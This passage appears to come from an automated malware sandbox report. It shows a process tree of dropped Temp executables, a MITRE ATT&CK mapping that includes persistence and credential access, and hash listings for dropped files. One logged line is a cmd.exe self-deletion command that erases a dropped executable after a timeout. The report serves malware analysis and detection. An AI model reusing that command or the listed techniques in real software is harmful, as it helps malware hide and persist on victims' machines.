                                                                                                C:\Users\Admin\AppData\Local\Temp\68A2.exe
                                                                                                1⤵
                                                                                                  PID:1660
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\68A2.exe"
                                                                                                    2⤵
                                                                                                      PID:5332
                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                        timeout /T 10 /NOBREAK
                                                                                                        3⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:5900
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7322.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\7322.exe
                                                                                                    1⤵
                                                                                                      PID:4892
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\75A4.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\75A4.exe
                                                                                                      1⤵
                                                                                                        PID:1960
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7C0E.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7C0E.exe
                                                                                                        1⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:3180
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          2⤵
                                                                                                            PID:4932
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\93FC.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\93FC.exe
                                                                                                          1⤵
                                                                                                            PID:4880
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9DF0.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\9DF0.exe
                                                                                                            1⤵
                                                                                                              PID:5780
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A92C.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\A92C.exe
                                                                                                              1⤵
                                                                                                                PID:1500
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AE6C.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\AE6C.exe
                                                                                                                1⤵
                                                                                                                  PID:2280
                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                    2⤵
                                                                                                                      PID:4496
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:5712
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:3160
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:5680
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:1856
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:5684
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:2112
                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:5376
                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5824
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:4720
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                      1⤵
                                                                                                                                        PID:4908
                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                        1⤵
                                                                                                                                          PID:2796
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C1E.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C1E.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:4492
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2573.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2573.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:6084

                                                                                                                                            Network

                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                            Persistence

                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                            1
                                                                                                                                            T1060

                                                                                                                                            BITS Jobs

                                                                                                                                            1
                                                                                                                                            T1197

                                                                                                                                            Defense Evasion

                                                                                                                                            Modify Registry

                                                                                                                                            3
                                                                                                                                            T1112

                                                                                                                                            BITS Jobs

                                                                                                                                            1
                                                                                                                                            T1197

                                                                                                                                            Install Root Certificate

                                                                                                                                            1
                                                                                                                                            T1130

                                                                                                                                            Credential Access

                                                                                                                                            Credentials in Files

                                                                                                                                            1
                                                                                                                                            T1081

                                                                                                                                            Discovery

                                                                                                                                            Software Discovery

                                                                                                                                            1
                                                                                                                                            T1518

                                                                                                                                            Query Registry

                                                                                                                                            4
                                                                                                                                            T1012

                                                                                                                                            System Information Discovery

                                                                                                                                            5
                                                                                                                                            T1082

                                                                                                                                            Peripheral Device Discovery

                                                                                                                                            1
                                                                                                                                            T1120

                                                                                                                                            Remote System Discovery

                                                                                                                                            1
                                                                                                                                            T1018

                                                                                                                                            Collection

                                                                                                                                            Data from Local System

                                                                                                                                            1
                                                                                                                                            T1005

                                                                                                                                            Command and Control

                                                                                                                                            Web Service

                                                                                                                                            1
                                                                                                                                            T1102

                                                                                                                                            Replay Monitor

                                                                                                                                            Loading Replay Monitor...

                                                                                                                                            Downloads

                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                              MD5

                                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                              SHA1

                                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                              SHA256

                                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                              SHA512

                                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                              MD5

                                                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                              SHA1

                                                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                              SHA256

                                                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                              SHA512

                                                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                            • C:\Program Files\Mozilla Firefox\MPJTYQPLWT\ultramediaburner.exe
                                                                                                                                              MD5

                                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                              SHA1

                                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                              SHA256

                                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                              SHA512

                                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                            • C:\Program Files\Mozilla Firefox\MPJTYQPLWT\ultramediaburner.exe
                                                                                                                                              MD5

                                                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                              SHA1

                                                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                              SHA256

                                                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                              SHA512

                                                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                            • C:\Program Files\install.dat
                                                                                                                                              MD5

                                                                                                                                              31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                                              SHA1

                                                                                                                                              c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                                              SHA256

                                                                                                                                              b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                                              SHA512

                                                                                                                                              3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                                            • C:\Program Files\install.dll
                                                                                                                                              MD5

                                                                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                              SHA1

                                                                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                              SHA256

                                                                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                              SHA512

                                                                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                                              MD5

                                                                                                                                              e71a0a7e48b10bde0a9c54387762f33e

                                                                                                                                              SHA1

                                                                                                                                              fed75947f1163b00096e24a46e67d9c21e7eeebd

                                                                                                                                              SHA256

                                                                                                                                              83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de

                                                                                                                                              SHA512

                                                                                                                                              394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                              MD5

                                                                                                                                              6c3fce6d2082bfc59b965d203a1b3e70

                                                                                                                                              SHA1

                                                                                                                                              73e6c165733f86d871df9e46872d979bdd3adcbe

                                                                                                                                              SHA256

                                                                                                                                              436b1be1d0d8237ebe97086da34e481c32589a2c703fb74bba939aa985adc355

                                                                                                                                              SHA512

                                                                                                                                              c1baa962ddd190757e2f91791a71674b4961236bccaa5eeef85558a4e56a7c8b46e3b3d9f6d2407d5cb5ff0979aeae6d59b046c7e8228c40e819fd43520e8e45

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                              MD5

                                                                                                                                              6be9e6cba14c4209dc681ae5c0432aca

                                                                                                                                              SHA1

                                                                                                                                              dfc0f86501ba0f7e51d74e4e4fa60f63e9c3d0ce

                                                                                                                                              SHA256

                                                                                                                                              3e74987b8c38904461f90c196e7a4cc98718b7b603e2eb5f87d7370b6ee38fb6

                                                                                                                                              SHA512

                                                                                                                                              f5325bb653d4f3744dabbe8e8446b7ad5e12e29e7122ee2187c6920720dadd69db90892afc7e8b1dae92b97aa34fbed7198b8e1867f13e69ec2707d2beff2017

                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                              MD5

                                                                                                                                              10394803342295f7427fedee01be2e21

                                                                                                                                              SHA1

                                                                                                                                              bf36c7466005762951991de5104b613ca8614b7b

                                                                                                                                              SHA256

                                                                                                                                              d36d06e458d7a0025e6bd4c215eb0dae9a4d44a5dba6bc67e8bce1d438ed62eb

                                                                                                                                              SHA512

                                                                                                                                              8e00d2b548a766feb5c8da69724cc25bdf8b5652231652114e312c450146d6fc00303310b2a5f497633e5c5366c393582faa47fda1a4f7b2d7ec15d2c0e5ab28

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\00-e4de5-65f-aa597-27662f9b4551c\Tocudabaeny.exe
                                                                                                                                              MD5

                                                                                                                                              18e49540637bccc9b3a7ca3d48cae223

                                                                                                                                              SHA1

                                                                                                                                              b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                                              SHA256

                                                                                                                                              698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                                              SHA512

                                                                                                                                              a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\00-e4de5-65f-aa597-27662f9b4551c\Tocudabaeny.exe
                                                                                                                                              MD5

                                                                                                                                              18e49540637bccc9b3a7ca3d48cae223

                                                                                                                                              SHA1

                                                                                                                                              b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                                              SHA256

                                                                                                                                              698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                                              SHA512

                                                                                                                                              a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\00-e4de5-65f-aa597-27662f9b4551c\Tocudabaeny.exe.config
                                                                                                                                              MD5

                                                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                              SHA1

                                                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                              SHA256

                                                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                              SHA512

                                                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0laxyern.kal\md1_1eaf.exe
                                                                                                                                              MD5

                                                                                                                                              fbe253720b5b96979799caef7d85c974

                                                                                                                                              SHA1

                                                                                                                                              d9c4dd755bc7c5ec4e8533995b89ffe065bec70a

                                                                                                                                              SHA256

                                                                                                                                              a1f1b6e5e90eec14bc40bf80abcbce0e44fc8094804b8e388719f0fac0794dc9

                                                                                                                                              SHA512

                                                                                                                                              386488da93b66f10f958ec2c3bc6bad34f4fb60552c4e3dbf329a13da1512470d6ce961016141b0caf5d5a8077414c29ebed15b110ea8d21cf189fac9c4e1463

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0laxyern.kal\md1_1eaf.exe
                                                                                                                                              MD5

                                                                                                                                              fbe253720b5b96979799caef7d85c974

                                                                                                                                              SHA1

                                                                                                                                              d9c4dd755bc7c5ec4e8533995b89ffe065bec70a

                                                                                                                                              SHA256

                                                                                                                                              a1f1b6e5e90eec14bc40bf80abcbce0e44fc8094804b8e388719f0fac0794dc9

                                                                                                                                              SHA512

                                                                                                                                              386488da93b66f10f958ec2c3bc6bad34f4fb60552c4e3dbf329a13da1512470d6ce961016141b0caf5d5a8077414c29ebed15b110ea8d21cf189fac9c4e1463

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0xcilthh.fii\toolspab1.exe
                                                                                                                                              MD5

                                                                                                                                              e20e11703b9d0eaff6435845448b7039

                                                                                                                                              SHA1

                                                                                                                                              77b505adb757654d4a022381bacc00a064e0edab

                                                                                                                                              SHA256

                                                                                                                                              4c07df1b246484e8cc49fd15756cfc3a7c1c0b14f611589268aafcd9a0950a00

                                                                                                                                              SHA512

                                                                                                                                              c7eb0162ca4df797fc27c2625352f377ecbefdfe0de281a476eff2dcbbf069f118dd54790858676a72928b8d09880e9a1cb6ed8f8d66d87119a92868d02bc0cf

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0xcilthh.fii\toolspab1.exe
                                                                                                                                              MD5

                                                                                                                                              e20e11703b9d0eaff6435845448b7039

                                                                                                                                              SHA1

                                                                                                                                              77b505adb757654d4a022381bacc00a064e0edab

                                                                                                                                              SHA256

                                                                                                                                              4c07df1b246484e8cc49fd15756cfc3a7c1c0b14f611589268aafcd9a0950a00

                                                                                                                                              SHA512

                                                                                                                                              c7eb0162ca4df797fc27c2625352f377ecbefdfe0de281a476eff2dcbbf069f118dd54790858676a72928b8d09880e9a1cb6ed8f8d66d87119a92868d02bc0cf

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0xcilthh.fii\toolspab1.exe
                                                                                                                                              MD5

                                                                                                                                              e20e11703b9d0eaff6435845448b7039

                                                                                                                                              SHA1

                                                                                                                                              77b505adb757654d4a022381bacc00a064e0edab

                                                                                                                                              SHA256

                                                                                                                                              4c07df1b246484e8cc49fd15756cfc3a7c1c0b14f611589268aafcd9a0950a00

                                                                                                                                              SHA512

                                                                                                                                              c7eb0162ca4df797fc27c2625352f377ecbefdfe0de281a476eff2dcbbf069f118dd54790858676a72928b8d09880e9a1cb6ed8f8d66d87119a92868d02bc0cf

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2akyy0de.4hi\inst.exe
                                                                                                                                              MD5

                                                                                                                                              edd1b348e495cb2287e7a86c8070898d

                                                                                                                                              SHA1

                                                                                                                                              682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                                                              SHA256

                                                                                                                                              eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                                                              SHA512

                                                                                                                                              613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2akyy0de.4hi\inst.exe
                                                                                                                                              MD5

                                                                                                                                              edd1b348e495cb2287e7a86c8070898d

                                                                                                                                              SHA1

                                                                                                                                              682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                                                              SHA256

                                                                                                                                              eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                                                              SHA512

                                                                                                                                              613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2vgwbtqw.3h3\app.exe
                                                                                                                                              MD5

                                                                                                                                              5334f7e66679ea48bf276ed8ca1e7095

                                                                                                                                              SHA1

                                                                                                                                              bb1c9fe2b9fafc3a23149aad099d6c0936074373

                                                                                                                                              SHA256

                                                                                                                                              b6a4065f542364cfb5c02cb2716f44fc3277852dde0ee36c364a6264a8dc4be5

                                                                                                                                              SHA512

                                                                                                                                              2edca1e36e20b7811ba736a99dd57db67913e313e96a858f9c210a689389c12540f60618c73cb0cf24c5dd16caf7835e7ccc242f2ec67de101e1e143bc3d8142

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2vgwbtqw.3h3\app.exe
                                                                                                                                              MD5

                                                                                                                                              5334f7e66679ea48bf276ed8ca1e7095

                                                                                                                                              SHA1

                                                                                                                                              bb1c9fe2b9fafc3a23149aad099d6c0936074373

                                                                                                                                              SHA256

                                                                                                                                              b6a4065f542364cfb5c02cb2716f44fc3277852dde0ee36c364a6264a8dc4be5

                                                                                                                                              SHA512

                                                                                                                                              2edca1e36e20b7811ba736a99dd57db67913e313e96a858f9c210a689389c12540f60618c73cb0cf24c5dd16caf7835e7ccc242f2ec67de101e1e143bc3d8142

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2vgwbtqw.3h3\app.exe
                                                                                                                                              MD5

                                                                                                                                              5334f7e66679ea48bf276ed8ca1e7095

                                                                                                                                              SHA1

                                                                                                                                              bb1c9fe2b9fafc3a23149aad099d6c0936074373

                                                                                                                                              SHA256

                                                                                                                                              b6a4065f542364cfb5c02cb2716f44fc3277852dde0ee36c364a6264a8dc4be5

                                                                                                                                              SHA512

                                                                                                                                              2edca1e36e20b7811ba736a99dd57db67913e313e96a858f9c210a689389c12540f60618c73cb0cf24c5dd16caf7835e7ccc242f2ec67de101e1e143bc3d8142

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5yjwljyr.1te\instEU.exe
                                                                                                                                              MD5

                                                                                                                                              bdb62dc3502ea91f26181fa451bd0878

                                                                                                                                              SHA1

                                                                                                                                              bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                                                              SHA256

                                                                                                                                              6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                                                              SHA512

                                                                                                                                              12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5yjwljyr.1te\instEU.exe
                                                                                                                                              MD5

                                                                                                                                              bdb62dc3502ea91f26181fa451bd0878

                                                                                                                                              SHA1

                                                                                                                                              bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                                                              SHA256

                                                                                                                                              6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                                                              SHA512

                                                                                                                                              12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\JdO6CLdwnY.exe
                                                                                                                                              MD5

                                                                                                                                              dac476eb95c28c5cc52eabaf262ac97d

                                                                                                                                              SHA1

                                                                                                                                              b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                                                                              SHA256

                                                                                                                                              4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                                                                                              SHA512

                                                                                                                                              276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\JdO6CLdwnY.exe
                                                                                                                                              MD5

                                                                                                                                              dac476eb95c28c5cc52eabaf262ac97d

                                                                                                                                              SHA1

                                                                                                                                              b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                                                                              SHA256

                                                                                                                                              4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                                                                                              SHA512

                                                                                                                                              276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dd-1a261-f45-bf9bb-c3abb99c72a25\Fidocajaby.exe
                                                                                                                                              MD5

                                                                                                                                              2e91d25073151415f8c39de2262cbba8

                                                                                                                                              SHA1

                                                                                                                                              32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                                              SHA256

                                                                                                                                              0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                                              SHA512

                                                                                                                                              306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dd-1a261-f45-bf9bb-c3abb99c72a25\Fidocajaby.exe
                                                                                                                                              MD5

                                                                                                                                              2e91d25073151415f8c39de2262cbba8

                                                                                                                                              SHA1

                                                                                                                                              32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                                              SHA256

                                                                                                                                              0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                                              SHA512

                                                                                                                                              306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dd-1a261-f45-bf9bb-c3abb99c72a25\Fidocajaby.exe.config
                                                                                                                                              MD5

                                                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                              SHA1

                                                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                              SHA256

                                                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                              SHA512

                                                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dd-1a261-f45-bf9bb-c3abb99c72a25\Kenessey.txt
                                                                                                                                              MD5

                                                                                                                                              97384261b8bbf966df16e5ad509922db

                                                                                                                                              SHA1

                                                                                                                                              2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                                              SHA256

                                                                                                                                              9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                                              SHA512

                                                                                                                                              b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\g1bwlhwz.r0r\GcleanerWW.exe
                                                                                                                                              MD5

                                                                                                                                              4f4adcbf8c6f66dcfc8a3282ac2bf10a

                                                                                                                                              SHA1

                                                                                                                                              c35a9fc52bb556c79f8fa540df587a2bf465b940

                                                                                                                                              SHA256

                                                                                                                                              6b3c238ebcf1f3c07cf0e556faa82c6b8fe96840ff4b6b7e9962a2d855843a0b

                                                                                                                                              SHA512

                                                                                                                                              0d15d65c1a988dfc8cc58f515a9bb56cbaf1ff5cb0a5554700bc9af20a26c0470a83c8eb46e16175154a6bcaad7e280bbfd837a768f9f094da770b7bd3849f88

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\gtn1vuw3.2sc\google-game.exe
                                                                                                                                              MD5

                                                                                                                                              e27c391b1f65a77478fcab4d5e102cef

                                                                                                                                              SHA1

                                                                                                                                              44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                                                              SHA256

                                                                                                                                              2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                                                              SHA512

                                                                                                                                              0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\gtn1vuw3.2sc\google-game.exe
                                                                                                                                              MD5

                                                                                                                                              e27c391b1f65a77478fcab4d5e102cef

                                                                                                                                              SHA1

                                                                                                                                              44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                                                              SHA256

                                                                                                                                              2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                                                              SHA512

                                                                                                                                              0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\gwswwxhq.ojs\SunLabsPlayer.exe
                                                                                                                                              MD5

                                                                                                                                              7b6cd80c7a780c4051440e16624d6cb8

                                                                                                                                              SHA1

                                                                                                                                              d7024abacf9d91b75e0c9ddcf79e8c864af15788

                                                                                                                                              SHA256

                                                                                                                                              d2376e83bae183f3f10b5489e66cb353d55efdeff082df2513fd46380ff3e68f

                                                                                                                                              SHA512

                                                                                                                                              7d0b467e01a1e7cc8a0367719a053e93319d79b2daae70b0db3fd32b1758fdd877fe2bea25713fe1393a820d67e7c533d33a774e25d2fda5209aaf7f43348b3a

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\gwswwxhq.ojs\SunLabsPlayer.exe
                                                                                                                                              MD5

                                                                                                                                              7b6cd80c7a780c4051440e16624d6cb8

                                                                                                                                              SHA1

                                                                                                                                              d7024abacf9d91b75e0c9ddcf79e8c864af15788

                                                                                                                                              SHA256

                                                                                                                                              d2376e83bae183f3f10b5489e66cb353d55efdeff082df2513fd46380ff3e68f

                                                                                                                                              SHA512

                                                                                                                                              7d0b467e01a1e7cc8a0367719a053e93319d79b2daae70b0db3fd32b1758fdd877fe2bea25713fe1393a820d67e7c533d33a774e25d2fda5209aaf7f43348b3a

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-6CHQ5.tmp\ultramediaburner.tmp
                                                                                                                                              MD5

                                                                                                                                              4e8c7308803ce36c8c2c6759a504c908

                                                                                                                                              SHA1

                                                                                                                                              a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                                              SHA256

                                                                                                                                              90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                                                              SHA512

